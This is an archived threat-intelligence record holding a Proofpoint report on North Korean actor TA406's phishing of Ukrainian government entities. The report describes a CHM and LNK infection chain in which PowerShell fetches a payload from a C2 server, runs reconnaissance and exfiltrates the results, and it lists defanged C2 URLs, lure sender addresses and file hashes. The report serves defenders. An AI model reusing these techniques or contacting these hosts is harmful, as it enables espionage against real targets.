{ "id": "2d2b6e17-e411-46c3-aae4-27180830378f", "created_at": "2026-04-06T00:22:08.45314Z", "updated_at": "2026-04-10T13:12:07.472886Z", "deleted_at": null, "sha1_hash": "02247521d3bc55b6eaf4e921f7fd5b75dc328187", "title": "TA406 Pivots to the Front | Proofpoint US", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3146260, "plain_text": "TA406 Pivots to the Front | Proofpoint US\r\nBy Greg Lesnewich, Saher Naumaan, Mark Kelly, and The Proofpoint Threat Research Team\r\nPublished: 2025-05-08 · Archived: 2026-04-05 13:16:14 UTC\r\nMay 13, 2025\r\nWhat happened \r\nIn February 2025, TA406 began targeting government entities in Ukraine, delivering both credential harvesting and malware\r\nin its phishing campaigns. The aim of these campaigns is likely to collect intelligence on the trajectory of the Russian\r\ninvasion. TA406 is a Democratic People's Republic of Korea (DPRK) state-sponsored actor that overlaps with activity\r\npublicly tracked by third parties as Opal Sleet and Konni. The group’s interest in Ukraine follows historical targeting of\r\ngovernment entities in Russia for strategic intelligence gathering purposes. TA406 relies on freemail senders spoofing\r\nmembers of think tanks to convince the target to engage with the phishing email. The lure content is based heavily off recent\r\nevents in Ukrainian domestic politics. \r\nMalware delivery \r\nSince at least 2019, TA406 has shown a preference for HTML and CHM files to run embedded PowerShell in the early\r\nstages of malware deployment campaigns. The lure emails observed in a February 2025 TA406 campaign impersonate a\r\nfictitious senior fellow at a think tank called the Royal Institute of Strategic Studies, which is also a fictitious organization.\r\nThe email contains a link to a file hosting service called MEGA, which downloads a password-protected RAR archive. If the\r\nfile is decrypted and run, it initiates an infection chain using PowerShell to conduct extensive reconnaissance on the target\r\nhost. The actor sent multiple phishing emails on consecutive days when the target did not click the link, asking the target if\r\nthey had received the prior emails and if they would download the files.\r\nFollow-up phishing email from TA406. \r\nThe file Analytical Report.rar drops a CHM file of the same name when decrypted. The CHM file contains multiple HTML\r\nfiles that displays lure content related to former Ukrainian military leader Valeriy Zaluzhnyi. PowerShell in the HTML\r\nexecutes if a user clicks within the page; this initiates a GET request to\r\nhxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/test.txt to download further PowerShell and execute it. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front\r\nPage 1 of 7\n\nThe next stage PowerShell file executes several commands to gather information about the victim host. These include\r\nipconfig /all, systeminfo, as well as commands to grab recent file names and disk information and commands to use WMI to\r\ngather information about any anti-virus tools installed on the host. The collected information is concatenated and Base64-\r\nencoded, then sent via POST request to hxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/receive.php. The PowerShell\r\nthen uses similar scripting logic from the initial HTML file and saves it to a file named state.bat in the host’s APPDATA\r\nfolder. The batch file is then installed as an autorun file for persistence and runs upon machine start up. \r\nLate stage PowerShell. \r\nProofpoint has also observed the first stage file as an HTML attachment to the phishing email. If the target opens the HTML\r\nand clicks the embedded link, a ZIP file is downloaded from hxxps://lorica[.]com.ua/MFA/вкладення.zip (machine\r\ntranslation: “attachment.zip”). The ZIP file contains a benign PDF as well as an LNK, ‘Why Zelenskyy fired Zaluzhnyi.lnk.’\r\nIf run, the LNK file executes Base64-encoded PowerShell. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front\r\nPage 2 of 7\n\nBenign PDF lure. \r\nThe decoded LNK command contains further Base64-encoded PowerShell, which initiates a scheduled task named\r\nWindows Themes Update. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front\r\nPage 3 of 7\n\nLNK command with Base64-encoded PowerShell. \r\nThe PowerShell uses VBScript to drop a Javascript Encoded file called Themes.jse, which is then run by the scheduled task.\r\nThe JSE file checks into a TA406-controlled URL and executes the response with PowerShell. Proofpoint was unable to\r\nobtain a next stage payload from this URL at the time of analysis.  \r\nDecoded PowerShell. \r\nLikely credential harvesting \r\nPrior to TA406’s malware delivery campaigns, Proofpoint also observed TA406 attempt to gather credentials by sending\r\nfake Microsoft security alert messages to Ukrainian government entities from Proton Mail accounts. The messages claim the\r\ntarget's account had unusual sign-in activity from various IP addresses, and request the target verify the login attempt via a\r\nlink to the compromised domain jetmf[.]com.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front\r\nPage 4 of 7\n\nLikely TA406 credential harvesting email. \r\nA credential harvesting page could not be recovered at the time of analysis. However, the same compromised domain has\r\nbeen abused previously for Naver credential harvesting, which aligns with historical TA406 activity, though high confidence\r\nattribution to TA406 has not been confirmed. These credential harvesting campaigns took place prior to the attempted\r\nmalware deployments and targeted some of the same users later targeted with the HTML delivery campaign mentioned\r\nabove.    \r\nWhy it matters  \r\nProofpoint assesses TA406 is targeting Ukrainian government entities to better understand the appetite to continue fighting\r\nagainst the Russian invasion and assess the medium-term outlook of the conflict. North Korea committed troops to assist\r\nRussia in the fall of 2024, and TA406 is very likely gathering intelligence to help North Korean leadership determine the\r\ncurrent risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments.\r\nUnlike Russian groups who have likely been tasked with gathering tactical battlefield information and targeting of Ukrainian\r\nforces in situ, TA406 has typically focused on more strategic, political intelligence collection efforts. \r\nIndicators of compromise \r\nIndicator  Type  Context \r\nFirst\r\nSeen \r\nMicroft Acount Tearns \u003cemln0reply@protonmail[.]com\u003e  Email \r\nCredential\r\nharvest\r\ndelivery \r\nFebru\r\n2025 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front\r\nPage 5 of 7\n\nMicrosooft \u003ceml-n0replypro@proton[.]me\u003e   Email \r\nCredential\r\nharvest\r\ndelivery \r\nFebru\r\n2025 \r\njetmf[.]com  Domain \r\nCredential\r\nharvest\r\ndelivery \r\nFebru\r\n2025 \r\njohn.smith.19880@outlook[.]com  Email \r\nMalware\r\ndelivery \r\nFebru\r\n2025 \r\njohn.dargavel.smith46@gmail[.]com  Email \r\nMalware\r\ndelivery \r\nFebru\r\n2025 \r\nhxxps://mega[.]nz/file/SmxUiA4K#QoS_PYQDnJN4VtsSg5HoCv5eOK0AI1bL6Cw5lxA0zfI  URL \r\nMalware\r\ndelivery \r\nFebru\r\n2025 \r\nhxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/test.txt  URL  C2 \r\nFebru\r\n2025 \r\nhxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/receive.php  URL  C2 \r\nFebru\r\n2025 \r\nhxxps://lorica[.]com.ua/MFA/вкладення.zip  URL \r\nMalware\r\ndelivery \r\nFebru\r\n2025 \r\nhxxp://qweasdzxc.mygamesonline[.]org/dn.php  URL  C2 \r\nFebru\r\n2025 \r\nhxxp://wersdfxcv.mygamesonline[.]org/view.php  URL  C2 \r\nFebru\r\n2025 \r\n58adb6b87a3873f20d56a10ccde457469adb5203f3108786c3631e0da555b917  SHA256 \r\nMalware\r\ndelivery \r\nFebru\r\n2025 \r\n28116e434e35f76400dc473ada97aeae9b93ca5bcc2a86bd1002f6824f3c9537  SHA256 \r\nMalware\r\ndelivery \r\nFebru\r\n2025 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front\r\nPage 6 of 7\n\n2a13f273d85dc2322e05e2edfaec7d367116366d1a375b8e9863189a05a5cec5  SHA256 \r\nMalware\r\ndelivery \r\nFebru\r\n2025 \r\nSubscribe to the Proofpoint Blog\r\nSource: https://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front\r\nhttps://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MISPGALAXY" ], "origins": [ "web" ], "references": [ "https://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front" ], "report_names": [ "ta406-pivots-front" ], "threat_actors": [ { "id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4", "created_at": "2025-08-07T02:03:25.096857Z", "updated_at": "2026-04-10T02:00:03.659118Z", "deleted_at": null, "main_name": "NICKEL JUNIPER", "aliases": [ "Konni", "OSMIUM ", "Opal Sleet " ], "source_name": "Secureworks:NICKEL JUNIPER", "tools": [ "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "3917d167-449d-423a-89db-41f49716a6d7", "created_at": "2023-03-04T02:01:54.083975Z", "updated_at": "2026-04-10T02:00:03.355386Z", "deleted_at": null, "main_name": "TA406", "aliases": [], "source_name": "MISPGALAXY:TA406", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b43c8747-c898-448a-88a9-76bff88e91b5", "created_at": "2024-02-02T02:00:04.058535Z", "updated_at": "2026-04-10T02:00:03.545252Z", "deleted_at": null, "main_name": "Opal Sleet", "aliases": [ "Konni", "Vedalia", "OSMIUM" ], "source_name": "MISPGALAXY:Opal Sleet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434928, "ts_updated_at": 1775826727, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/02247521d3bc55b6eaf4e921f7fd5b75dc328187.pdf", "text": "https://archive.orkl.eu/02247521d3bc55b6eaf4e921f7fd5b75dc328187.txt", "img": "https://archive.orkl.eu/02247521d3bc55b6eaf4e921f7fd5b75dc328187.jpg" } }